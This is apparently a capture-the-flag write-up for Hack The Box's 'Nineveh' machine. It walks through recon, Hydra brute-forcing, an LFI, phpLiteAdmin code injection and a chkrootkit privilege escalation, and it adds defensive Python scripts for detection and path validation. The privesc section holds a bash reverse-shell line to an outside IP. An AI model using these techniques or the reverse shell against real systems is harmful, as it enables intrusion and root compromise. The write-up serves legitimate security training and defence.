Nineveh
- Linux
- Medium
Recon
- Nmap
```
─❯ sudo nmap -p- -T5 -Pn -sV -sC $target -v
Nmap scan report for 10.129.99.169
Host is up (0.045s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Issuer: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2017-07-01T15:03:30
| Not valid after:  2018-07-01T15:03:30
| MD5:   d182 94b8 0210 7992 bf01 e802 b26f 8639
|_SHA-1: 2275 b03e 27bd 1226 fdaa 8b0f 6de9 84f0 113b 42c0
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
```
HTTP
- We find in the nmap output that the SSL certificate belongs to commonName=nineveh.htb, so we add nineveh.htb to our /etc/hosts.
Port 80
- Fuzzing the site we find a department directory with a login.php page.
- In the source of the webpage we find the following comment, so we can try to brute-force credentials later:
```html
<!-- @admin! MySQL is been installed.. please fix the login page! ~amrois -->
```
Port 443
- Fuzzing the website on port 443 finds some directories:
```
ffuf -v -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u https://nineveh.htb/FUZZ -v -c -t 100
...
[Status: 301, Size: 309, Words: 20, Lines: 10]
| URL | https://nineveh.htb/db
| --> | https://nineveh.htb/db/
    * FUZZ: db

[Status: 200, Size: 49, Words: 3, Lines: 2]
| URL | https://nineveh.htb/
    * FUZZ:

[Status: 403, Size: 300, Words: 22, Lines: 12]
| URL | https://nineveh.htb/server-status
    * FUZZ: server-status

[Status: 301, Size: 319, Words: 20, Lines: 10]
| URL | https://nineveh.htb/secure_notes
| --> | https://nineveh.htb/secure_notes/
    * FUZZ: secure_notes
...
```
- In the /db/ directory we find the following:
  - phpLiteAdmin
  - Version 1.9
- In /secure_notes/ we find an image.
- We download the image and check its metadata:
```
╰─❯ exiftool nineveh.png
ExifTool Version Number         : 12.16
File Name                       : nineveh.png
Directory                       : .
File Size                       : 2.8 MiB
File Modification Date/Time     : 2017:07:03 01:50:02+02:00
File Access Date/Time           : 2021:02:18 17:47:55+01:00
File Inode Change Date/Time     : 2021:02:18 17:47:50+01:00
File Permissions                : rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 1497
Image Height                    : 746
Bit Depth                       : 8
Color Type                      : RGB
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Significant Bits                : 8 8 8
Software                        : Shutter
Warning                         : [minor] Trailer data after PNG IEND chunk
Image Size                      : 1497x746
Megapixels                      : 1.1
```
- We see a warning telling us that there is trailer data after the PNG IEND chunk. We extract it with binwalk:
```
╰─❯ binwalk nineveh.png
DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 1497 x 746, 8-bit/color RGB, non-interlaced
84            0x54            Zlib compressed data, best compression
2881744       0x2BF8D0        POSIX tar archive (GNU)
```
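What exiftool's warning and binwalk's offsets are both reporting is the same structural fact: a PNG ends at its IEND chunk, so any bytes after it are foreign to the image. The following script is an added example (not from the writeup or from either tool) that walks the chunk list, validates each CRC, and returns whatever trails IEND, then identifies it by magic bytes. The 1x1 PNG and the ustar header block it works on are constructed in the script itself, as stand-ins for nineveh.png and the embedded tar archive; the appended-data check is what a defender would run over uploaded images or a web root.

```python
import struct
import zlib
from typing import List, Tuple

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_chunk(chunk_type: bytes, data: bytes) -> bytes:
    """Assemble one chunk: 4-byte length, type, data, CRC32 over type + data."""
    crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + chunk_type + data + struct.pack(">I", crc)


def build_sample_png() -> bytes:
    """Constructed sample: a valid 1x1 RGB PNG (a stand-in for nineveh.png, not the real file)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # width, height, bit depth, RGB, 0, 0, 0
    scanline = b"\x00" + b"\xff\x00\x00"  # filter type 0 followed by one red pixel
    return (PNG_SIGNATURE + png_chunk(b"IHDR", ihdr)
            + png_chunk(b"IDAT", zlib.compress(scanline)) + png_chunk(b"IEND", b""))


def build_sample_tar_header() -> bytes:
    """Constructed 512-byte ustar header block, the kind of thing binwalk reports as a tar archive."""
    header = bytearray(512)
    header[0:10] = b"note.txt\x00\x00"   # name field; the rest of the header is left zeroed
    header[257:263] = b"ustar\x00"       # the ustar magic sits at byte 257 of every tar header
    return bytes(header)


def walk_png(png: bytes) -> Tuple[List[str], int]:
    """Walk the chunk list up to IEND and return (chunk types, offset just past IEND).

    Raises ValueError for anything malformed; a triage script should treat that as suspicious too.
    """
    if not png.startswith(PNG_SIGNATURE):
        raise ValueError("bad PNG signature")
    pos = len(PNG_SIGNATURE)
    types: List[str] = []
    while True:
        if pos + 8 > len(png):
            raise ValueError("ran out of data before IEND")
        (length,) = struct.unpack(">I", png[pos:pos + 4])
        ctype = png[pos + 4:pos + 8]
        data_end = pos + 8 + length
        if data_end + 4 > len(png):
            raise ValueError("truncated chunk %r" % ctype)
        (want_crc,) = struct.unpack(">I", png[data_end:data_end + 4])
        have_crc = zlib.crc32(png[pos + 4:data_end]) & 0xFFFFFFFF
        if want_crc != have_crc:
            raise ValueError("CRC mismatch in chunk %r" % ctype)
        types.append(ctype.decode("ascii", errors="replace"))
        pos = data_end + 4
        if ctype == b"IEND":
            return types, pos


def trailer_after_iend(png: bytes) -> bytes:
    """The bytes following IEND: empty for a clean file, the appended payload otherwise."""
    _, end = walk_png(png)
    return png[end:]


def describe_blob(blob: bytes) -> str:
    """Identify common appended formats by magic bytes (the idea binwalk applies at scale)."""
    if len(blob) >= 262 and blob[257:262] == b"ustar":
        return "POSIX tar archive"
    if blob[:2] == b"PK":
        return "ZIP archive"
    if blob[:2] == b"\x1f\x8b":
        return "gzip data"
    return "unknown data"


if __name__ == "__main__":
    stego = build_sample_png() + build_sample_tar_header()
    tail = trailer_after_iend(stego)
    print("chunks:", walk_png(stego)[0], "| trailer bytes:", len(tail), "->", describe_blob(tail))
```

Because the walk checks every CRC, a file that has been tampered with inside the chunk list is reported as an error rather than silently accepted, which is the behaviour you want from a scanner that runs unattended.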
- Examining the extracted files, we find a private SSH key, but port 22 on the machine is not open, so we keep it for now.
Shell as www-data
- We try to brute-force the admin credentials with Hydra against the login.php page on port 80.
- Then we log in and get redirected to http://nineveh.htb/department/manage.php?notes=files/ninevehNotes.txt
- After tampering a bit, we find there is an LFI in the notes parameter.
- But we need to upload a PHP file, for example, to get a shell through the LFI, as there is no SSH port.
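The root cause of an LFI like the one in manage.php is that the notes value is handed to an include without being pinned to a directory. As an added example (not the application's code, and written in Python rather than PHP so it runs stand-alone), this is the validation a fixed manage.php would apply to the parameter: the web root and the files subdirectory are assumed paths chosen for the example, and the function works purely on strings, so it never touches the filesystem.

```python
import posixpath
from typing import Optional

# Assumed layout (not taken from the box): the script lives in APP_DIR, notes live in APP_DIR/files.
APP_DIR = "/var/www/html/department"
NOTES_ROOT = posixpath.join(APP_DIR, "files")
ALLOWED_SUFFIXES = (".txt",)


def resolve_note(requested: str) -> Optional[str]:
    """Map a user-supplied ?notes= value to a path that is safe to include, or None.

    Rejects NUL bytes, anything with a scheme (php:, data:, expect:, zip:, ...), absolute
    and backslash paths, any traversal that leaves NOTES_ROOT, and non-.txt targets.
    """
    if not requested or "\x00" in requested:
        return None
    if ":" in requested or "\\" in requested or requested.startswith("/"):
        return None
    # Join relative to the application directory, then collapse "." and ".." segments.
    candidate = posixpath.normpath(posixpath.join(APP_DIR, requested))
    # The collapsed path must still sit under NOTES_ROOT; commonpath exposes any escape.
    if posixpath.commonpath([NOTES_ROOT, candidate]) != NOTES_ROOT:
        return None
    if not candidate.endswith(ALLOWED_SUFFIXES):
        return None
    return candidate


if __name__ == "__main__":
    for value in ("files/ninevehNotes.txt", "files/../../../../../etc/passwd",
                  "files/../manage.php", "php://filter/resource=manage.php"):
        print("%-45s -> %s" % (value, resolve_note(value)))
```

The two checks that matter most are the normalisation before the prefix comparison (a naive `startswith` on the raw string is defeated by `files/../`) and the extension allowlist, which stops the include from ever pointing at a file that the interpreter would execute.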
- Coming back to the phpLiteAdmin application, we also brute-force credentials with Hydra, finding that the password is password123:
```
╰─❯ hydra nineveh.htb -l user -P /usr/share/seclists/Passwords/probable-v2-top12000.txt https-post-form "/db/index.php:password=^PASS^&proc_login=true:Incorrect password"
...
[DATA] attacking http-post-forms://nineveh.htb:443/db/index.php:password=^PASS^&proc_login=true:Incorrect password
[443][http-post-form] host: nineveh.htb   login: user   password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-02-18 18:37:37
```
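Both Hydra runs on this box (login.php on port 80 and /db/index.php on 443) leave the same footprint in the Apache access log: a burst of POSTs to one login endpoint from one client. As an added example (not from the writeup), the script below parses combined-format log lines and flags any client whose POSTs to a login path exceed a threshold inside a sliding time window. The log lines are constructed for the example and the set of login paths is an assumption; on a real host you would point it at the access log and adjust LOGIN_PATHS.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, Iterable, List, Optional, Tuple

# Apache combined log format; the query string is stripped from the path before matching.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
LOGIN_PATHS = {"/department/login.php", "/db/index.php"}  # assumed for the example

# Constructed sample log (not captured from the box): one client hammering /db/index.php
# and one ordinary client that gets its password wrong once.
SAMPLE_LOG = """\
10.10.14.20 - - [18/Feb/2021:18:37:28 +0100] "GET / HTTP/1.1" 200 49 "-" "Mozilla/5.0"
10.10.14.58 - - [18/Feb/2021:18:37:30 +0100] "POST /db/index.php HTTP/1.1" 200 1931 "-" "Mozilla/4.0 (Hydra)"
10.10.14.58 - - [18/Feb/2021:18:37:30 +0100] "POST /db/index.php HTTP/1.1" 200 1931 "-" "Mozilla/4.0 (Hydra)"
10.10.14.58 - - [18/Feb/2021:18:37:31 +0100] "POST /db/index.php HTTP/1.1" 200 1931 "-" "Mozilla/4.0 (Hydra)"
10.10.14.20 - - [18/Feb/2021:18:37:31 +0100] "POST /department/login.php HTTP/1.1" 200 1330 "-" "Mozilla/5.0"
10.10.14.58 - - [18/Feb/2021:18:37:31 +0100] "POST /db/index.php HTTP/1.1" 200 1931 "-" "Mozilla/4.0 (Hydra)"
10.10.14.58 - - [18/Feb/2021:18:37:32 +0100] "POST /db/index.php HTTP/1.1" 200 1931 "-" "Mozilla/4.0 (Hydra)"
10.10.14.20 - - [18/Feb/2021:18:37:33 +0100] "POST /department/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.14.58 - - [18/Feb/2021:18:37:33 +0100] "POST /db/index.php HTTP/1.1" 200 1931 "-" "Mozilla/4.0 (Hydra)"
10.10.14.58 - - [18/Feb/2021:18:37:37 +0100] "POST /db/index.php HTTP/1.1" 302 0 "-" "Mozilla/4.0 (Hydra)"
"""


def parse_line(line: str) -> Optional[dict]:
    """Return the fields we need from one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m.group("ip"),
        "ts": datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z"),
        "method": m.group("method"),
        "path": m.group("path").split("?", 1)[0],
        "status": int(m.group("status")),
    }


def detect_bruteforce(lines: Iterable[str], threshold: int = 5,
                      window_seconds: int = 60) -> Dict[Tuple[str, str], int]:
    """Map (client ip, login path) to the largest number of POSTs seen inside any window.

    Only pairs reaching `threshold` are returned; everything else is considered normal use.
    """
    attempts: Dict[Tuple[str, str], List[datetime]] = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] not in LOGIN_PATHS:
            continue
        attempts[(rec["ip"], rec["path"])].append(rec["ts"])

    flagged: Dict[Tuple[str, str], int] = {}
    for key, stamps in attempts.items():
        stamps.sort()
        start, best = 0, 0
        for end, ts in enumerate(stamps):  # classic sliding window over sorted timestamps
            while (ts - stamps[start]).total_seconds() > window_seconds:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            flagged[key] = best
    return flagged


if __name__ == "__main__":
    for (ip, path), count in detect_bruteforce(SAMPLE_LOG.splitlines()).items():
        print("%s -> %s: %d POSTs within 60s" % (ip, path, count))
```

Counting is deliberately done per endpoint rather than per client only, so a client that browses normally and also hits one login form repeatedly stands out; the status code is parsed but not used for the verdict, because phpLiteAdmin answers a wrong password with 200 just like a page load, which is exactly why Hydra needed the "Incorrect password" string above.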
- Now that we have access to phpLiteAdmin, and we confirmed before that the version is 1.9, we can find a reliable exploit for it. To exploit it we do the following:
  - Create a new database called test.php
  - Create a table in the database called SHELL
  - Insert PHP code into this table
- After doing that, we just need to use the LFI found before to include our PHP file, which will execute commands. So we URL-encode a reverse shell in the request.
Privesc
- After transferring the typical enumeration scripts, we use pspy to inspect the processes executing on the machine, and we find that the root user is running chkrootkit.
- We find an exploit for this program abusing an unquoted execution.
- We just need to create a file in /tmp/ called update that will be executed:
```bash
echo "/bin/bash -c 'bash -i >& /dev/tcp/10.10.14.58/5555 0>&1' &" > /tmp/update
```
- Wait for the root user to execute chkrootkit and we are done.
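The privesc works because an affected chkrootkit build, run as root, ends up executing a file literally named /tmp/update if one exists. That makes the artifact easy to look for from the defender's side. The script below is an added example (not part of the writeup or of chkrootkit) that audits a directory for exactly that file, reports why it is dangerous (regular file, non-root owner, execute bit), and can be run live against /tmp or fed stat values from a collected listing; the directory default and the watched name are assumptions for the example.

```python
import os
import stat
from typing import Dict, List

# Names that an affected chkrootkit would execute from a world-writable directory (assumed set).
WATCHED_NAMES = {"update"}


def classify_entry(name: str, st_mode: int, st_uid: int) -> List[str]:
    """Return the reasons a directory entry is suspicious; an empty list means it is not.

    Only regular files with a watched name count: that is what the unquoted expansion
    in chkrootkit would run as a command when it is executed by root.
    """
    if name not in WATCHED_NAMES or not stat.S_ISREG(st_mode):
        return []
    reasons = ["regular file named %r in a shared temp directory" % name]
    if st_uid != 0:
        reasons.append("owned by uid %d, not root" % st_uid)
    if st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH):
        reasons.append("has an execute bit set")
    return reasons


def scan_directory(path: str = "/tmp") -> Dict[str, List[str]]:
    """Live check: stat every entry in path and collect the suspicious ones."""
    findings: Dict[str, List[str]] = {}
    with os.scandir(path) as entries:
        for entry in entries:
            st = entry.stat(follow_symlinks=False)  # do not follow planted symlinks
            reasons = classify_entry(entry.name, st.st_mode, st.st_uid)
            if reasons:
                findings[entry.path] = reasons
    return findings


if __name__ == "__main__":
    hits = scan_directory()
    if not hits:
        print("no watched files found in /tmp")
    for full_path, why in hits.items():
        print(full_path + ":")
        for reason in why:
            print("  - " + reason)
```

Run periodically (or hooked to a file-creation audit rule on /tmp), this gives a clear signal shortly after the artifact appears and before the next scheduled chkrootkit run; the long-term fix is simply to upgrade chkrootkit past the affected release, since the mechanism is a bug in the tool rather than anything the operator misconfigured.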